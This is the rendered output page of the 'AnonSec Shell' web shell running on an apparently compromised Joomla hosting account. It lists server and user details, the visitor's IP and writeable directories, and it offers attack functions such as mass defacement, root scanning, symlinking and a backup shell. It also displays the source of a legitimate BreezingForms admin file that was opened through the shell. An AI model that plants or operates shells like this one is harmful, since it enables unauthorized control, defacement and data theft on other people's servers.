AnonSec Shell
Server IP : 87.98.231.4  /  Your IP : 216.73.217.178   [ Reverse IP ]
Web Server : Apache
System : Linux webm007.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : grupmartgn ( 667608)
PHP Version : 8.5.7
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/grupmartgn/elanartcrafts/administrator/components/com_breezingforms/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home/grupmartgn/elanartcrafts/administrator/components/com_breezingforms/breezingforms.php
<?php
/**
 * @package     BreezingForms
 * @author      Markus Bopp
 * @link        https://www.crosstec.org
 * @license     GNU/GPL
*/
defined('_JEXEC') or die('Direct Access to this location is not allowed.');

if(!defined('DS')){
    define('DS', DIRECTORY_SEPARATOR);
}

jimport('joomla.version');
$version = new JVersion();

if(version_compare($version->getShortVersion(), '3.0', '>=')){

    $controller = JControllerLegacy::getInstance('Breezingforms');
    $controller->execute('');
    $controller->redirect();

}

require_once(JPATH_SITE.DS.'administrator'.DS.'components'.DS.'com_breezingforms'.DS.'admin.breezingforms.php');

if(version_compare($version->getShortVersion(), '3.2', '>=')) {

	if( JFactory::getApplication()->getTemplate() == 'isis' ) {

		JFactory::getDocument()->addScript( JUri::root( true ) . '/administrator/components/com_breezingforms/assets/js/custom.js' );
		JFactory::getDocument()->addStyleSheet( JUri::root( true ) . '/administrator/components/com_breezingforms/assets/css/custom.css' );

	}
}

JFactory::getDocument()->addStyleSheet(JUri::root(true) .'/administrator/components/com_breezingforms/assets/font-awesome/css/font-awesome.css');

if(version_compare($version->getShortVersion(), '3.0', '>=')){

    $recs        = JRequest::getVar('act','') == 'managerecs' || JRequest::getVar('act','') == 'recordmanagement' || JRequest::getVar('act','') == '';
    $mgforms     = JRequest::getVar('act','') == 'manageforms' || JRequest::getVar('act','') == 'easymode' || JRequest::getVar('act','') == 'quickmode';
    $mgscripts   = JRequest::getVar('act','') == 'managescripts';
    $mgpieces    = JRequest::getVar('act','') == 'managepieces';
    $mgintegrate = JRequest::getVar('act','') == 'integrate';
    $mgmenus     = JRequest::getVar('act','') == 'managemenus';
    $mgconfig    = JRequest::getVar('act','') == 'configuration';

    $add = '';
    if($recs) $add        = ': ' . JText::_('COM_BREEZINGFORMS_MANAGERECS');
    if($mgforms) $add     = ': ' . JText::_('COM_BREEZINGFORMS_MANAGEFORMS');
    if($mgscripts) $add   = ': ' . JText::_('COM_BREEZINGFORMS_MANAGESCRIPTS');
    if($mgpieces) $add    = ': ' . JText::_('COM_BREEZINGFORMS_MANAGEPIECES');
    if($mgintegrate) $add = ': ' . JText::_('COM_BREEZINGFORMS_INTEGRATOR');
    if($mgmenus) $add     = ': ' . JText::_('COM_BREEZINGFORMS_MANAGEMENUS');
    if($mgconfig) $add    = ': ' . JText::_('COM_BREEZINGFORMS_CONFIG');

    $app = JFactory::getApplication();
    $app->JComponentTitle = "BreezingForms" . $add;
    if(version_compare($version->getShortVersion(), '3.2', '>=')){
        $app->JComponentTitle = "<h1 class=\"page-title\">BreezingForms" . $add . '</h1>';
    }
}

Anon7 - 2022
AnonSec Team